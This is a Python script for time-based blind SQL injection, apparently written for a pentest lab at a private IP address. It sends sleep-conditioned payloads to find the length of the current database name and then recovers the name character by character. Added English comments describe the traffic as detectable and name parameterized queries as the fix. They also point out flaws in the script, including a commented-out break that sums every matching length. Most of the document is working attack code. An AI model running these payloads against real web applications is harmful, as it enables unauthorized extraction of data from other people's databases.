思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称.
#encoding=utf-8
#时间盲注脚本
import requests
import time
import datetime
#获取数据库长度
def database_len():
    """Probe the length of the current database name with a time-based blind payload.

    For each candidate length 1..14 one GET request is sent whose ``type``
    parameter carries an ``if(length(database())=N, sleep(1), 1)`` expression;
    a round trip longer than one second is taken as a match.  Nothing is
    returned: the result is only printed.

    NOTE(review): indentation was reconstructed from a whitespace-mangled
    paste; the loop/if nesting below is the most plausible reading.

    From a defensive standpoint this traffic is easy to spot: a burst of
    sequential requests to the same path, each differing only in a numeric
    literal, with ``sleep(`` in the query string and a response latency that
    tracks the payload.  The underlying flaw is an unparameterized query;
    binding ``type`` as a parameter removes the injection point entirely.
    """
    # Accumulated result; ``database`` is assigned but never used here.
    length=0
    database=''
    print ("start get length...")
    for l in range(1,15):
        startTime1=time.time()
        # Candidate-length payload; the request is not given a timeout.
        url1 = "http://172.20.10.14/pentest/test/time/?type=1 and if(length(database())=%d,sleep(1),1)"%(l)
        response1 = requests.get(url1)   # response body is never inspected
        # Elapsed wall-clock time is the only oracle; network jitter above
        # the one-second threshold produces a false positive.
        if time.time() - startTime1 > 1:
            # ``break`` is commented out, so every matching candidate is
            # summed into ``length`` rather than stopping at the first hit.
            length+=l
            print ("the length :" , str(length))
            # break
    print ("start database sql injection...")
# Module-level call: runs as a side effect of importing or executing the file.
database_len()
#获取数据库名
def database_name():
    """Recover the database name one character at a time via conditional delays.

    For positions 1..14 and each character in ``0-9a-z`` a GET request is
    sent whose ``type`` parameter carries
    ``if(substr(database(),POS,1)='C', sleep(2), 1)``; a response that takes
    two or more whole seconds is taken as a hit, the character is appended to
    ``name`` and the inner loop moves to the next position.  The result is
    only printed, not returned.

    NOTE(review): indentation was reconstructed from a whitespace-mangled
    paste; the nesting below is the most plausible reading.

    Defensive view: the request pattern is ~36 near-identical URLs per
    character, all carrying ``substr(database()`` and ``sleep(`` and a
    trailing ``%23`` (URL-encoded ``#``) comment marker.  Rate-based alerting
    on repeated latency spikes from one client, plus parameterized queries at
    the application, address both detection and root cause.
    """
    name = ''
    for j in range(1, 15): # adjust 15 to the expected name length
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = '''http://172.20.10.14/pentest/test/time/'''
            payload = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (
                j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            # '%23' is a URL-encoded '#' that comments out the rest of the query.
            r = requests.get(url + payload + '%23')   # response body unused
            time2 = datetime.datetime.now()
            # timedelta.seconds is the whole-second component only, so the
            # fractional part of the delay is discarded before the comparison.
            sec = (time2 - time1).seconds
            if sec >= 2:
                name += i
                print(name)
                break
    print('database_name:', name)
# Module-level call: runs as a side effect of importing or executing the file.
database_name()